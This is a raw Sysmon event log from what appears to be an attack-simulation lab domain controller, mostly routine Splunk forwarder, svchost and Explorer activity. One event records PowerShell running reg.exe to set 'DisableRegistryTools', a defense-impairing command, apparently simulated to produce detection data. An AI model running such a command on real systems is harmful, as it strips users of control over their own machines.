12:09:32.112{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-65AB-6064-5001-00000000AE01}24562612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+781c0|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+23cc02(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aaaa4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System\e4e1c2ddf26e804ce437760cd9a5ba23\System.ni.dll+1aa39c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5d4219a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537afa3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537aca0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automat
ion.ni.dll+e5cb9293(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5344c0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e5394e98(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537ce58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\e05ebf906fda9e1c579ba89d8f0679ea\System.Management.Automation.ni.dll+e537cd75(wow64) 154100x800000000000000010898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.124{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=ECB768001DC8424E9B1FF3AC1E89C937,SHA256=CBB9F8D012CB0AF2CA87AC74ABB5C77A7743C64697C8D92104D3EBA27A699AB0,IMPHASH=7EF58A970E6E6D04FE3D5D7732CF5BAA{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000010911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:33.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD81E57059A23A0A148C111C6EC7C6E6,SHA256=A65A5FAD3CDCAD56C437059F89DA5DF39AE6AC4C4AF120312AF7D856F75D9BA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:33.128{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C02E7FB33577F719410400EED48FE052,SHA256=C9B80B132CEFF062C57209ECCF67F242DA40CF972EFC16E8B241D6A7923E818F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:33.018{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xb5b9e68d) 23542300x800000000000000010913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:34.675{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=539AA435D0148B46CF1E7D20E820F2D3,SHA256=E68BA4836EF01694DD5E2B82C34711BC098FE973936D06B65B4DDD06DBD3EC5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:34.159{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x800000000000000010920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000010919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000010918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000010917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d72626-0xb77087cc) 13241300x800000000000000010916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 
13241300x800000000000000010915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:35.893{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 23542300x800000000000000010914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:35.690{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D719F9BCCF55CECFCF0710BA43358CA8,SHA256=6CAF31334738A8D3DFA2B03AF0E2125F00F587C7CED45E28FD3402BDB0409E09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:36.690{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3784A975C2A77CA73E2C451AD99E22,SHA256=887A15F48D5DDC724B242894F3ADB450C58BA92E8C1DC60AB9C0B819DFF623DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:37.706{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A51353FC99F36613E83FD7338E95F6,SHA256=5CFCFBA2A7A604BD09C894B7494D546CB37E589969CC4B32B42B1BE6CED66DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:38.705{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD02C85522615E5BD66636E7C048623,SHA256=8D992925C31FB1FD61D00A8290A3C986898D85796C5079ABB79EA49C4B15F232,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:36.569{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53713-false10.0.1.12-8000- 23542300x800000000000000010925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:39.721{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68BFCE31BDABDF2DDAA43DD739855404,SHA256=036A83FDF1D5C18FADF2351351ED9D96120FB857E7FB37B3D6506FFC858B3919,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.815{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:40.736{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DB2325A58A4808B771FF74D37395427,SHA256=641768433B5760CE0F5F6009441EBCC5569C2ED364E6FD41FA3D45C3062659B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:41.736{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC7A4C02C5A12C54B206A2155743120,SHA256=DCFC7E5C46835CDCF020A756DFC9BA3680B9D292A9B5708902D038C0406647CF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.752{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76B2E2BBF49690A4FB5CA2CE2867F7A,SHA256=B20501B13F0D351A7E439C9F521D83B14634DA3F34C7746D1C64A81B014D3765,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.471{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.846{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18A87A5362D997EE55E762C1582D8B7B,SHA256=CBD41A5802A3C709C870463F8A48A52BB01A221F3D847E4DA9E141D6D60BC07D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.642{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C6A64E182A6A6EBC148FBF36D0EBCEA,SHA256=262B7B272B7753061660CBF43ABEAE30D9A375E85F793E41F4EEB5E7A2A0B34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:43.642{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=787613594085E9168DAD20C0527D30C9,SHA256=097ADBA32BAAB0BB3C9A0EE45079390FE94C71485C28303B5C30C849982789AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:42.475{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53714-false10.0.1.12-8000- 23542300x800000000000000010943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:44.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DD1C60859D9088CBD340712D0062858,SHA256=D39B0E2682244C41684FB10BFEC849A9CE8A4FF1AF1C379E6B44E95DCFF4ABF6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:44.470{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x800000000000000010941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:44.470{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=908D703F7E0A572AE68923E1192BEDAA,SHA256=C010587A3AA11847CA6C3367FAE119459A8356715EB32BDB03B689D3CFB2AAEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:45.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CACA0E0D96C8DBBBA70C88B9D3C67C55,SHA256=075D2893B312CA6AF0707811F46487B5B4F71E54BDBDB6B58712F72D39EAE6E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:46.970{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EAC3B351F67570C15CF80718A6331C,SHA256=808192FAC6E7E547E8723CB5310083D6D0A807E0F90C4A1C29FE2E7CB452F3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:48.939{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:47.584{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53715-false10.0.1.12-8000- 23542300x800000000000000010946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:48.095{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1C9D507699378758DFEB44F0A76088,SHA256=7A1D6EADF8705BD106FC6463E2298A61D9EF44D69D244E9A747F9E1741C9867F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:49.611{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 